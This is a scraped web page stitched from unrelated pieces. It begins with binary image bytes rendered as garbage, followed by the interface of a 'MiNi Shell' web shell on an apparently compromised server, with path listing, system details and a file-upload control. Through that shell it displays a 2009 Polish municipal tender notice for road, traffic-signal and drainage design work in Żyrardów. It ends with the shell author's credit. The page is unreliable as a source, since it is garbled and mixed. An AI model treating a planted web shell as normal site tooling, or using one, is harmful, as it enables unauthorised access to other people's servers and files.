JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090520/157470-N-2009.html

<p class="kh_header"><b>Żyrardów: Wykonanie dokumentacji projektowo-wykonawczej z częścią kosztorysową wraz    z uzyskaniem wszystkich niezbędnych decyzji i uzgodnień na:
Przebudowę chodników i zjazdów w ciągu drogi wojewódzkiej nr 719 oraz budowę sygnalizacji świetlnej na dwóch skrzyżowaniach drogi wojewódzkiej nr 719 z ulicami  Św. Jana oraz Lelewela w Żyrardowie wraz z przebudową skrzyżowań.</b><br>
<b>Numer ogłoszenia: 157470 - 2009; data zamieszczenia: 20.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Żyrardów Wydział Gospodarki Komunalnej , Plac Jana Pawła II 1, 96-300 Żyrardów, woj. mazowieckie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zyrardow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo-wykonawczej z częścią kosztorysową wraz    z uzyskaniem wszystkich niezbędnych decyzji i uzgodnień na:
Przebudowę chodników i zjazdów w ciągu drogi wojewódzkiej nr 719 oraz budowę sygnalizacji świetlnej na dwóch skrzyżowaniach drogi wojewódzkiej nr 719 z ulicami  Św. Jana oraz Lelewela w Żyrardowie wraz z przebudową skrzyżowań..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie dokumentacji projektowej opracowanej w oparciu              o aktualne przepisy, w szczególności :
1.	Ustawy Prawo zamówień publicznych,
2.	Ustawy Prawo budowlane,
3.	Ustawy o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych,
4.	Ustawy o drogach publicznych
5.	Ustawy o zwalczaniu nieuczciwej konkurencji,
6.	Ustawy o cenach,
7.	Ustawy o ochronie informacji niejawnych
8.	Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego
9.	Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004r w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych prac projektowych oraz planowanych kosztów robót budowlanych określonych           w programie funkcyjno-użytkowym
10.	Rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r.      w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie.
Dokumentacja projektowa powinna zawierać wszystkie dokumenty wyszczególnione w : 
-	Rozporządzeniu Ministra Infrastruktury z dnia 2.09.2004r. w Rozdziale 2; Zakres i forma dokumentacji projektowej w paragrafie 4.1 dotyczącym dokumentacji projektowej, służącej do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których jest wymagane pozwolenie na budowę oraz w Rozdziale 3; Zakres i forma specyfikacji technicznej wykonania i odbioru robót budowlanych. 
-	Ustawie o szczególnych zasadach przygotowania i realizacji inwestycji             w zakresie dróg publicznych w Rozdziale 2a artykuł 11d 
Ponadto Zamawiający oczekuje, że dokumentacja projektowo - kosztorysowa zawierać będzie uszczegółowienie właściwe dla projektu wykonawczego oraz Specyfikację techniczną wykonania  i odbioru robót. 
Całość ww. dokumentacji musi być dostarczona Zamawiającemu w 6 egzemplarzach. Wykonawca dostarczy kosztorysy inwestorskie, ofertowe oraz przedmiary robót w 2-ch egzemplarzach dla każdej branży.
Poza wersją papierową całość dokumentacji musi być zgromadzona w wersji elektronicznej na płycie CD - 1 egzemplarz ( dokumentacja techniczna - opisy Word, kosztorysy EXCEL, rysunki Auto-CAD i PDF)  
W cenie usługi należy ująć wszelkie roboty pomocnicze niezbędne do wykonania przedmiotu zamówienia. 
* informacja o możliwości składania ofert częściowych:  
Zamawiający nie dopuszcza składania ofert częściowych. 

Oznaczenie wg Wspólnego Słownika Zamówień ( CPV ) : 
71.24.20.00-6 - przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów
71.35.40.00-4 - usługi sporządzenia map
71.32.25.00-6 - usługi inżynierii projektowej w zakresie sygnalizacji ruchu drogowego

III A. Zakres rzeczowy dokumentacji projektowo-kosztorysowej winien obejmować                  w szczególności :

1.	przebudowę chodników i zjazdów w ciągu drogi wojewódzkiej nr 719 w granicach administracyjnych Miasta Żyrardowa 
2.	budowę sygnalizacji świetlnej na dwóch skrzyżowaniach drogi wojewódzkiej nr 719    z ulicami Świętego Jana oraz Lelewela w Żyrardowie z przebudową geometrii skrzyżowań i rozwiązaniem odwodnienia wraz z kosztorysami ofertowymi i inwestorskimi - przy przebudowie skrzyżowania ul. Świętego Jana z ul. Reymonta należy przewidzieć wydzielone pasy ruchu dla poszczególnych kierunków,
3.	budowę ścieżek rowerowych, 
4.	wymianę istniejącego kolektora kanalizacji deszczowej w projektowanym chodniku, 
-	istniejące przykanaliki od wpustów deszczowych w jezdni włączyć                           do projektowanego kolektora deszczowego,
5.	budowę podczyszczalni ścieków deszczowych,
6.	przebudowę istniejącej infrastruktury w pasie drogowym drogi wojewódzkiej nr 719, kolidującej z przebudową drogi, jako wyodrębniony tom opracowania 
7.	kosztorysy inwestorskie i ofertowe na powyższe zadanie.
8.	projekt stałej organizacji ruchu dotyczący całego ciągu przebudowywanej drogi nr 719
9.	projekt organizacji ruchu na czas przebudowy (czasowa organizacja ruchu)

III. B. W ramach w/w zakresu należy przygotować wniosek o wydanie decyzji            o zezwoleniu na realizację inwestycji drogowej, zawierający w szczególności :
1.	wykonanie map w skali co najmniej 1:5.000 przedstawiającą proponowany przebieg 
      poszczególnych elementów drogi ( chodników, ścieżki rowerowej, jezdni, zjazdów )          
      z zaznaczeniem terenu niezbędnego dla obiektów budowlanych ulicy oraz istniejące 
      uzbrojenie terenu,
2.	analizę powiązania drogi z innymi drogami publicznymi,   
3.	mapy zawierające projekty podziału nieruchomości, sporządzone zgodnie                       z odrębnymi przepisami ( mapy podziałowe sporządzone przez geodetów )
4.	określenie zmian w dotychczasowej infrastrukturze zagospodarowania terenu, aktualnym na dzień opracowania projektu ( ust.7 ustawy z dnia 7 lipca 1994r. - Prawo budowlane ),
5.	6 egzemplarzy projektu budowlanego i wykonawczego w branży drogowej,                 w branżach dotyczących ewentualnej przebudowy infrastruktury, w branży dotyczącej budowy nowej sygnalizacji świetlnej na dwóch skrzyżowaniach drogi wojewódzkiej nr 719 w Żyrardowie z ul. Lelewela i ul. Świętego Jana, kanalizacji deszczowej, specyfikację wykonania i odbioru robót budowlanych,   
6.	uzyskanie niezbędnych opinii, uzgodnień, decyzji do wykonania przedmiotu zamówienia oraz tych które wynikają z zapisów art.11d ust.1 pkt 8, 9 oraz ust.2, 3, 4 ustawy z dnia 10 kwietnia 2003r o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.( Dz. U. 2003r. Nr 80 poz. 721 ze zm.), w tym mapy do celów projektowych,  
7.	Dostosowanie istniejącego drzewostanu do opracowywanego projektu budowlanego    i przedstawienie projektu ewentualnej wycinki zieleni,
8.	Opracowanie stałej organizacji ruchu,
9.	Obsługę geodezyjną, opłaty za uzgodnienia i decyzje 
10.	Opracowanie operatu wodnoprawnego wraz z uzyskaniem pozwolenia na odprowadzenie ścieków deszczowych do odbiornika

Z opracowania należy wyłączyć fragment drogi wojewódzkiej nr 719 w Żyrardowie na odcinku za skrzyżowaniem z ul. Mickiewicza od wysokości MC Donalds do ul. Opolskiej       w Żyrardowie - odcinek ten objęty jest innym opracowaniem. Przedmiotowy zakres opracowania należy skorelować z projektem opracowywanym przez Zarząd Dróg Wojewódzkich dla w/w fragmentu ulicy Reymonta..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6, 71.35.40.00-4, 71.32.25.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki udziału w postępowaniu o zamówienie publiczne.

O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
1.1. Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień ( uprawnienia projektowe w zakresie specjalności drogowej, elektrycznej, sygnalizacji świetlnej, kanalizacji deszczowej);  

1.2. Posiadający niezbędną wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia ( w okresie ostatnich 3 lat tj. 2006-2008 a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali min. jedno zamówienie odpowiadając swoim rodzajem i wartością dokumentacji projektowo-kosztorysowej dotyczącej przebudowy lub budowy drogi, sygnalizacji świetlnej, kanalizacji deszczowej, lub sanitarnej, stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie, dysponują osobami z uprawnieniami projektowymi                   i zaświadczeniem z właściwej izby inżynierów budownictwa lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia      

1.3. Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 

1.4. Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia .  

2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne dokonana zostanie zgodnie z formułą  spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach        i oświadczeniach wyszczególnionych w pkt VI

Z ubiegania się o zamówienia publicznego wyklucza się wykonawców zgodnie z zapisami art.24 ustawy Pzp.
   
3. Zamawiający odrzuca ofertę wykonawcy zgodnie z zapisami art. 89 ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A.W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej 
działalności lub czynności oraz nie podlega wykluczeniu z postępowania składa następujące dokumenty:
A.1) uprawnienia projektowe w zakresie objętym niniejszym zamówieniem publicznym (do wykonywania projektów drogowych, sanitarnych, elektrycznych,  w zakresie sygnalizacji świetlnej, kanalizacji deszczowej) potwierdzone zaświadczeniem o przynależności do właściwej Izby Inżynierów budownictwa.  

A.2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie   wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  

A.3) Dokumenty potwierdzające posiadanie uprawnień ( pełnomocnictw osób )składających ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych.  

A.4) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego         oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia         Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem         podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub  zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie  na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego          organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania   ofert.  

A.5) Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie  właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby  w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert.  

A.6) Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert.   

A.7) Pisemne oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ustawy Prawo zamówień publicznych. Zał. nr 2   
          
B.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy
i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do      wykonania zamówienia należy złożyć następujące dokumenty:

 B.1) Wykaz wykonanych (min. jednej) dokumentacji projektowo-kosztorysowej  w okresie ostatnich trzech lat ( 2006-2008 ) przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem ( projekty drogowe z elementami urządzeń budowy sygnalizacji świetlnej z częścią kosztorysową ) i wartością ( min 80% ceny ofertowej ) stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie. Zał. nr 6.
Wykonawcy mogą także przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

B.2) Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia   niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich  czynności. Zał. nr 4. 

B.3) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu  zamówienia, posiadają wymagane uprawnienia projektowe o specjalności drogowej, sanitarnej, elektrycznej w zakresie projektowania sygnalizacji świetlnej wraz   z aktualnymi dokumentami potwierdzającymi przynależność do właściwej Izby Inżynierów Budownictwa (co najmniej 3 lata praktyki w zakresie projektowania oraz aktualnymi dokumentami potwierdzającymi przynależność do właściwej Izby Inżynierów Budownictwa). 
	
C.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć oświadczenie 
sporządzone przez Wykonawcę
	
 D. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:

D.1) Zamiast dokumentów, o których mowa w pkt. A.1), A.2), A.3) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału  w postępowaniu.
	2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału  w postępowaniu. 

D.2) Zamiast dokumentu, o którym mowa w pkt. A.6) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. 

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. D zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych  w niniejszym pkt.D.   
	
E. Wypełniony formularz ofertowy sporządzony zgodnie z treścią dołączona do SIWZ  - zał. nr 1.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zyrardow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żyrardowa, pok.29
ul. Pl. Jana Pawła II nr 1
96-300 Żyrardów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2009 godzina 10:00, miejsce: Prezydent Miasta Żyrardowa, 
Wydział Gospodarki Komunalnej  
Plac Jana Pawła II nr1
96-300 Żyrardów
pok. 29.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com